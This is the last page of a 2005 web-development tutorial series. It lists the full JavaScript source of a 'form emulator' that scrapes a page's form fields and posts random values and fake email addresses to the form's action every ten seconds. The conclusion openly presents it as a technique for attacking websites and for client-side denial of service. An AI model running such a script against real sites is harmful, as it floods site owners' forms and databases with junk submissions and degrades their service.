JavaScript
  Home arrow JavaScript arrow Page 5 - Programmatic POST Requests with JavaScript...
Dev Articles Forums 
ADO.NET  
Apache  
ASP  
ASP.NET  
C#  
C++  
ColdFusion  
COM/COM+  
Delphi-Kylix  
Design Usability  
Development Cycles  
DHTML  
Embedded Tools  
Flash  
Graphic Design  
HTML  
IIS  
Interviews  
Java  
JavaScript  
MySQL  
Oracle  
Photoshop  
PHP  
Reviews  
Ruby-on-Rails  
SQL  
SQL Server  
Style Sheets  
VB.Net  
Visual Basic  
Web Authoring  
Web Services  
Web Standards  
XML  
Moblin 
JMSL Numerical Library 
IBM® developerWorks 
Sun Developer Network 
Weekly Newsletter
 
Developer Updates  
Free Website Content 
 RSS  Articles
 RSS  Forums
 RSS  All Feeds
Write For Us Get Paid 
Request Media Kit
Contact Us 
Site Map 
Privacy Policy 
Support 
 USERNAME
 
 PASSWORD
 
 
  >>> SIGN UP!  
  Lost Password? 
JAVASCRIPT

Programmatic POST Requests with JavaScript: Form Emulator in Action
By: Alejandro Gervasio
  • Search For More Articles!
  • Disclaimer
  • Author Terms
  • Rating: 4 stars4 stars4 stars4 stars4 stars / 12
    2005-08-03

    Table of Contents:
  • Programmatic POST Requests with JavaScript: Form Emulator in Action
  • The first step in coding the example: listing the program’s functions
  • The second step in coding the example: defining the sample files
  • The third step in coding the example: running the form emulator program
  • The complete form emulator script: listing the full source code

  • Rate this Article: Poor Best 
      ADD THIS ARTICLE TO:
      Del.ici.ous Digg
      Blink Simpy
      Google Spurl
      Y! MyWeb Furl
    Email Me Similar Content When Posted
    Add Developer Shed Article Feed To Your Site
    Email Article To Friend
    Print Version Of Article
    PDF Version Of Article
     
     
    ADVERTISEMENT


    Programmatic POST Requests with JavaScript: Form Emulator in Action - The complete form emulator script: listing the full source code


    (Page 5 of 5 )

    To finish this tutorial, here is the full code for the form emulator script, including some basic (X)HTML markup and CSS declarations:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
    Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
    transitional.dtd">

    <html>

    <head>

    <title>Post Http Requests with JavaScript</title>

    <script type="text/javascript">

    function getXMLHTTPObject(){

        //instantiate new XMLHttpRequest object

        var objhttp=(window.XMLHttpRequest)?new XMLHttpRequest
    ():new ActiveXObject('Microsoft.XMLHTTP');

        if(!objhttp){return};

        // assign event handler

        objhttp.onreadystatechange=displayStatus;

        // return XMLHttpRequest object

        return objhttp;

    }

    // function sendRequest

    function sendRequest(url,data,method,mode,header){

        // set default values

        if(!url){url='default_url.htm'};

        if(!data){data='defaultdata=defaultvalue'};

        if(!method){method='post'};

        if(!mode){mode=true};

        if(!header){header='Content-Type:application/x-www-form-
    urlencoded; charset=UTF-8'};

        // get XMLHttpRequest object

        objhttp=getXMLHTTPObject();

        // open socket connection

        objhttp.open(method,url,mode);

        // set http header

        objhttp.setRequestHeader(header.split(':')
    [0],header.split(':')[1]);

        // send data

        objhttp.send(data);

    }

    // function displayStatus

    function displayStatus(){

        // check XMLHttpRequest object status

        if(objhttp.readyState==4){

            // create paragraph elements

            var parStat=document.createElement('p');

            var parText=document.createElement('p');

            var parResp=document.createElement('p');

            // assign ID attributes

            parStat.id='status';

            parText.id='text';

            parResp.id='response';

            // append text nodes

            parStat.appendChild(document.createTextNode
    ('Status : '+objhttp.status));

            parText.appendChild(document.createTextNode('Status
    text : '+objhttp.statusText));

            parResp.appendChild(document.createTextNode
    ('Document code : '+objhttp.responseText));

            // insert <p> elements into document tree

            document.body.appendChild(parStat);

            document.body.appendChild(parText);

            document.body.appendChild(parResp);

            // get form code

            getFormCode();

        }

    }

    // function getFormCode

    function getFormCode(){

        // create <div> container

        var fdiv=document.createElement('div');

        // append <div> container into document tree

        document.body.appendChild(fdiv);

        // get page code

        var html=objhttp.responseText;

        // insert form code into document tree

        fdiv.innerHTML=html.substring(html.search
    (/<form\b/),html.search(/<\/form>/));

        // hide form from being displayed

        fdiv.style.display='none';

    }

    // function getFormVariables

    function getFormVariables(){

        var formvars='';

        var childElements=document.getElementsByTagName('form')
    [0].childNodes;

        for(var i=0;i<childElements.length;i++){

            if(/(INPUT|TEXTAREA|SELECT)/.test(childElements[i].nodeName)){

                                       // check if field name contains the string 'email'     

                                        formvars+=(/mail/.test
    (childElements[i].getAttribute('name')))?childElements
    [i].getAttribute('name')+'='+getRandomEmail()
    +'&':childElements[i].getAttribute('name')
    +'='+getRandomValue()+'&';

            }

        }

        formvars=formvars.substring(0,formvars.length-1);

        return formvars;

    }

    // function getFormAction

    function getFormAction(){

        var formaction=document.getElementsByTagName('form')
    [0].getAttribute('action');

        if(!formaction){return};

        return formaction;

    }

    // function getRandomValue

    function getRandomValue(){

        var chars='abcdefghiklmnopqrstuvwxyz0123456789';

        var rndstring='';

        var strlength=Math.floor(Math.random()*8)+2;

        for(var i=0;i<strlength;i++){

            var rndvalue=Math.floor(Math.random()*chars.length);

            rndstring+=chars.substring(rndvalue,rndvalue+1);

        }

        return rndstring;

    }

    // function getRandomEmail

    function getRandomEmail(){

        return 'johndoe'+getRandomValue()+'@'+getRandomValue()+'.com';

    }

    window.onload=function(){

        if(document.getElementsByTagName&&document.createElement){

            // send first get request to form page

            sendRequest('post_form.htm','','get',false);

            // send post request every 10 seconds

            setInterval("sendRequest(getFormAction
    (),getFormVariables(),'post',true);",10*1000);

        }

    }

    </script>

    <style type="text/css">

    h1 {

        font: bold 12px Arial, Helvetica, sans-serif;

        color: #000;

    }

    p {

        font: normal 11px Arial, Helvetica, sans-serif;

        color: #00f;

    }

    </style>

    </head>

    <body>

    <h1>Emulating POST form submissions with JavaScript...</h1>

    </body>

    </html>

    With reference to the above code, I’ve basically specified the script to be executed when the page has finished loading, as well as declared a couple of CSS styles for controlling the visual presentation of the information. Quite simple, isn’t it?

    Conclusion

    Over this series, I’ve offered wide-ranging coverage of the real implementation of JavaScript-based http requests as a growing form for attacking websites. The tutorials provided the basics of client-side denial of service attacks, as well as form emulation techniques.

    Of course, due to the inherently insecure nature of the Internet, and specifically the Web, numerous attacking techniques are continuously emerging, so the methods described above are only a small piece within this conflictive scenario. Now that you’ve been warned, go and build more robust and safer Web programs.


    DISCLAIMER: The content provided in this article is not warranted or guaranteed by Developer Shed, Inc. The content provided is intended for entertainment and/or educational purposes in order to introduce to the reader key ideas, concepts, and/or product reviews. As such it is incumbent upon the reader to employ real-world tactics for security and implementation of best practices. We are not liable for any negative consequences that may result from implementing any information covered in our articles or tutorials. If this is a hardware review, it is not recommended to open and/or modify your hardware.

       · The final part of the series implements a fully-functional form emulator, which...
     

    JAVASCRIPT ARTICLES

    - Using Mod_Security to Protect Your Server
    - Detecting and Countering Server Intrusions
    - Securing Your Web Server
    - Building a Secure Web Server
    - Protecting the Server
    - Book Review: Learning the Yahoo! User Interf...
    - Dynamically Generate a Selection List in a R...
    - Intergrate DWR into Your Java Web Application
    - Detect Browser Compatibility with the Reques...
    - Using the EXT JS Date Picker Widget
    - Ajax Hack for Entering Information Without R...
    - EXT JS 2.1 Overview
    - Using the Style Object for Zebra Tables with...
    - Binary Searching
    - An Improved Approach to Building Zebra Tables






    © 2003-2008 by Developer Shed. All rights reserved. DS Cluster 4 hosted by Hostway
    Stay green...Green IT